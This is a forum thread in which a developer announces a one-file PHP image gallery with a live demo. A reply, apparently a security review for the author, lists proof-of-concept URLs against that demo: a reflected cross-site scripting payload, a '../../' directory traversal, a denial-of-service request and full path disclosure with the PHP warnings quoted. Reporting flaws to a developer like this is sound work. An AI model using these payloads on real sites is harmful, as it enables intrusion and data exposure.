Jump to content

Simple PHP Image Gallery


R_P

Recommended Posts

Hey guys,

 

So I often find myself sticking images in a web folder and then having the apache (or IIS) indexes turned on so that my friends can browse through the file names. Not the most effective image gallery, I know. Instead of going through the thousands of open source galleries out there, I decided to create my own, heres what is different about it:

 

It consists of one file (the index file).

It does not rely on either flat file or SQL databases.

Creates thumbnails upon first install and whenever you add new images.

Thumbnails generator includes real-time progress bar - useful when you have a lot of images.

*Essentially the image gallery for really lazy (or busy  ;) ) developers

 

Heres the file:

http://ryan.crawford.com/gallery.zip

 

Heres a demo:

http://ryan.crawford.com/yjfc/flyin07/?v=g

 

There are a few known bugs and issues. No documentation yet. Feel free to poke around with it and post if you have any questions. Also make sure to tell me you server configuration and the browser(s) you used to test it with.

 

Thanks!

Ryan

 

PS - And keep in mind this is an EARLY RELEASE. It doesn't have near the functionality that I'm planning for it.

Link to comment
Share on other sites

Array:

http://ryan.crawford.com/yjfc/flyin07/?v=meta&file[]

 

Cross Site Scripting:

http://ryan.crawford.com/yjfc/flyin07/?v=meta&file="><marquee><h1>vulnerable</marquee>

 

Directory Transversal:

http://ryan.crawford.com/yjfc/flyin07/?v=meta&file=../../oshkosh/Glenn Oshkosh/DSCN5637.JPG

 

DOS:

http://ryan.crawford.com/yjfc/flyin07/?act=auth

 

Full Path Disclosure:

http://ryan.crawford.com/yjfc/flyin07/?v=meta

Warning: getimagesize(./thumbs/) [function.getimagesize]: failed to open stream: No such file or directory in C:\InetRoot\www\yjfc\flyin07\index.php on line 552

 

Full Path Disclosure:

http://ryan.crawford.com/yjfc/flyin07/?v=meta&file=a

Warning: getimagesize(./thumbs/a) [function.getimagesize]: failed to open stream: No such file or directory in C:\InetRoot\www\yjfc\flyin07\index.php on line 552

 

Warning: getimagesize(a) [function.getimagesize]: failed to open stream: No such file or directory in C:\InetRoot\www\yjfc\flyin07\index.php on line 553

Link to comment
Share on other sites

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.